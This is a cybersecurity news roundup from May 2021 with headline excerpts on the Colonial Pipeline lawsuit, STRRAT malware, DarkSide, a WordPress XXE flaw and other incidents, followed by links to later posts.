OSN May 21, 2021

Fortify Security Team
May 21, 2021

Title: Colonial Pipeline Hit With Class Action Lawsuit Following Cyberattack, Shutdown

Date Published: May 21, 2021


Excerpt: “The lawsuit states: “As a result of the Defendant’s failure to properly secure the Colonial Pipeline’s critical infrastructure – leaving it subjected to potential ransomware attacks like the one that took place on May 7, 2021, there have been catastrophic effects for consumers and other end-users of gasoline up and down the east coast. The Defendant’s unlawfully deficient data security has injured millions”

Title: Here’s How We Got Persistent Shell Access on a Boeing 747 – Pen Test Partners

Date Published: May 21, 2021


Excerpt: “The system was so ancient its management server ran on Windows NT4 SP3, a distant ancestor of today’s Windows Server builds. That age posed a problem for PTP’s testers when they tried running modern pentesting tools against it: NT4 predated everyday attack surfaces such as the Remote Desktop Protocol. Simply put, lots of modern tools and techniques didn’t work. Metasploit all but failed, giving no obvious reason for doing so. Even Backtrack, the predecessor to Kali Linux, didn’t work – triggering lots of scratching of heads at PTP HQ.”

Title: Microsoft Warns of Data Stealing Malware That Pretends to Be Ransomware

Date Published: May 21, 2021


Excerpt: “STRRAT first emerged in the threat landscape in June 2020, with German cybersecurity firm G Data observing the Windows malware (version 1.2) in phishing emails containing malicious Jar (or Java Archive) attachments. “The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging,” G Data malware analyst Karsten Hahn detailed. “It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird”.”

Title: Comcast Now Blocks BGP Hijacking Attacks and Route Leaks With RPKI

Date Published: May 16, 2021


Excerpt: “This helps to ensure that packets get to their intended destinations intact and cannot be hijacked or leaked to other destinations, making the network – and Internet traffic more generally – more secure and resilient for all users. Given the size and technical diversity of our network, deploying RPKI represented a significant effort, yet we were able to implement the update without disrupting performance for our customers.”

Title: Darkside Affiliates Claim Gang’s Bitcoins in Deposit on Hacker Forum

Date Published: May 21, 2021


Excerpt: “REvil ransomware last year deposited $1 million worth of Bitcoin to a different hacking forum to attract new recruits into the operation. This move showed that they trusted the forum administrator with the money and that there was plenty of money to be made. Last week, DarkSide closed shop and informed affiliates that the decision came after losing access to their public-facing servers and it was “due to the pressure from the US” after the attack on Colonial Pipeline.”

Title: Microsoft Simuland, an Open-Source Lab Environment to Simulate Attack Scenarios

Date Published: May 21, 2021


Excerpt: “Microsoft has released SimuLand, an open-source lab environment that allows to reproduce the techniques used in real attack scenarios. The tool could be used to test and improve Microsoft solutions, including Microsoft 365 Defender, Azure Defender, and Azure Sentinel defenses against real attack scenarios.”

Title: Microsoft, Google Clouds Hijacked for Gobs of Phishing

Date Published: May 19, 2021


Excerpt: “The malicious message volume from these trusted cloud services exceeded that of any botnet in 2020, and the trusted reputation of these domains, including outlook.com and sharepoint.com, increases the difficulty of detection for defenders,” the report, issued Wednesday, explained. “This authenticity perception is essential, as email recently regained its status as the top vector for ransomware; and, threat actors increasingly leverage the supply chain and partner ecosystem to compromise accounts, steal credentials and siphon funds.”

Title: Dev-Sec Disconnect Undermines Secure Coding Efforts

Date Published: May 20, 2021


Excerpt: “Among the advice that Romeo has for security teams and companies intent on improving their application security programs: Tune the tools to reduce false positives, work together to determine the right amount of resources to dedicate to security needs, educate developers about security, and also educate security professionals about development.”

Title: This Ransomware-Spreading Malware Botnet Just Won’t Go Away

Date Published: May 21, 2021


Excerpt: “The botnet, known for using old-fashioned worms that spread via removable USB drives and instant messaging apps, began diversifying its infrastructure in recent years to become more resilient and to deliver more dangerous payloads, Microsoft said. The botnet’s geographic targeting for bot distribution and installation expanded, too, it said: “more recent activity shows a shift to a more global distribution.”

Title: WordPress XXE Vulnerability in Media Library – CVE-2021-29447

Date Published: May 21, 2021


Excerpt: “WordPress versions 5.7, 5.6.2, 5.6.1, 5.6, 5.0.11 are affected to XML eXternal Entity vulnerability where an authenticated user with the ability to upload files in the Media Library can upload a malicious WAVE file that could lead to remote arbitrary file disclosure and server-side request forgery (SSRF).”

Recent Posts

June 30, 2022

Title: Google Blocked Dozens of Domains Used by Hack-For-Hire Groups Date Published: June 30, 2022 https://www.bleepingcomputer.com/news/security/google-blocked-dozens-of-domains-used-by-hack-for-hire-groups/ Excerpt: “Google's Threat Analysis Group (TAG) has blocked...

June 28, 2022

Title: Over 900,000 Kubernetes Instances Found Exposed Online Date Published: June 28, 2022 https://www.bleepingcomputer.com/news/security/over-900-000-kubernetes-instances-found-exposed-online/ Excerpt: “Over 900,000 misconfigured Kubernetes clusters were found...

June 27, 2022

Title: CafePress Fined $500,000 for Breach Affecting 23 Million Users Date Published: June 24, 2022 https://www.bleepingcomputer.com/news/security/cafepress-fined-500-000-for-breach-affecting-23-million-users/ Excerpt: “The U.S. Federal Trade Commission (FTC) has...

June 24, 2022

Title: Scalper Bots out of Control in Israel, Selling State Appointments Date Published: June 23, 2022 https://www.bleepingcomputer.com/news/security/scalper-bots-out-of-control-in-israel-selling-state-appointments/ Excerpt: “Out-of-control scalper bots have created...

June 23, 2022

Title: New MetaMask Phishing Campaign uses KYC Lures to Steal Passphrases Date Published: June 23, 2022 https://www.bleepingcomputer.com/news/security/new-metamask-phishing-campaign-uses-kyc-lures-to-steal-passphrases/ Excerpt: “A new phishing campaign is targeting...

June 22, 2022

Title: Microsoft Reveals Cause Behind this Week’s Microsoft 365 Outage Date Published: June 22, 2022 https://www.bleepingcomputer.com/news/microsoft/microsoft-reveals-cause-behind-this-week-s-microsoft-365-outage/ Excerpt: “Microsoft has revealed that this week's...

June 21, 2022

Title: Microsoft 365 Outage Affects Microsoft Teams and Exchange Online Date Published: June 21, 2022 https://www.bleepingcomputer.com/news/microsoft/microsoft-365-outage-affects-microsoft-teams-and-exchange-online/ Excerpt: “An ongoing outage affects multiple...